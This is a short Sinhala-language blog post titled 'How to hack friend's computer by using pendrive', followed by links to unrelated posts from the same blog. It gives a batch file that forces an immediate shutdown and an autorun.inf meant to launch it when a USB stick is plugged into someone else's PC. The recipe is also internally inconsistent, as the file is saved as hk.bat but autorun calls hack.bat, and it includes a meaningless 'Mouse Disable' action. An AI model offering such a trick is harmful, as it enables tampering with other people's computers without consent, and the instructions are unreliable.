Skip to main content

How to හැක් friend’s computer by using pendrive



කරන්න තියෙන්නේ මුලින්ම Notepad එකක් හදාගන්න. එකේ පහල තියෙන Code එක Type කරන්න 

@echo off
shutdown -s -t 00


හරි දැන් ඕක save කරගන්න..මතක ඇතුව save කරද්දී නමට hk.bat දෙන්න 

අයෙත් Notepad එකක් හදාගන්න එකේ පහල තියෙන code එක type කරන්න 

[autorun]
Open=hack.bat
Action=Mouse Disable

මතක ඇතුව ඕක save කරද්දී නමට autorun.inf‘ දෙන්න.

දැන් ඔය File දෙක Pen එකට් copy කරන්න එතකොට වැඩේ හරි. පෙන් එක ගහපු ගමන් Pc එක Off ..........





Popular posts from this blog

වේලාව සම්බන්ද තොරතුරු සියල්ල ලබා දෙන ටයිම් ඇන්ඩ් ඩේට්

යම් පරිගණකයක් හරහා මෙම වේබ් සේවයට පිවිසි විට එම පරිගණකයේ ඇති කලාපයේ වේලාව පිලීබද තොරතුරු පෙන්වයි. ඒ ඒ සමග කැලැන්ඩර් සහ වේලාව ගණනය කිරීමට අවශ්‍ය වෙනත් සේවා ගණනාවක්ද දෙයි. Click Here

විභාග වලට බය නැතුව මුහුණ දෙන්න

අපේ ජිවිතේ සෑම කෙනෙකුටම මුහුණ දීමට තිබෙන කඩඉමක් තමයි විබාග කියන්නේ.විබාග වලිනුත් අපට තියෙන විශේෂ විෂයක් තමයි ගණිතය කියන්නේ,මම අද දෙන්න යන්නේ ගණිතයට බය වෙන් නේ නැතුව නොබියව මුහුණ දෙන්න ගණිතය Paper පැක් ටිකක්.මේවා තියෙන්නේ PDF කරලා පහලින් PDF Reader එකත් එක්කම බාගන්න :)  Download PDF Reader Download Maths Papers

Sound Recorder Software

මෙන්න නියම Sound Record කරන්න පුලුවන් Software එකක්. හොදද කියල බලන්න දැන්ම අරගන්න... මෙතනින් ගන්න. Online Voice Recorder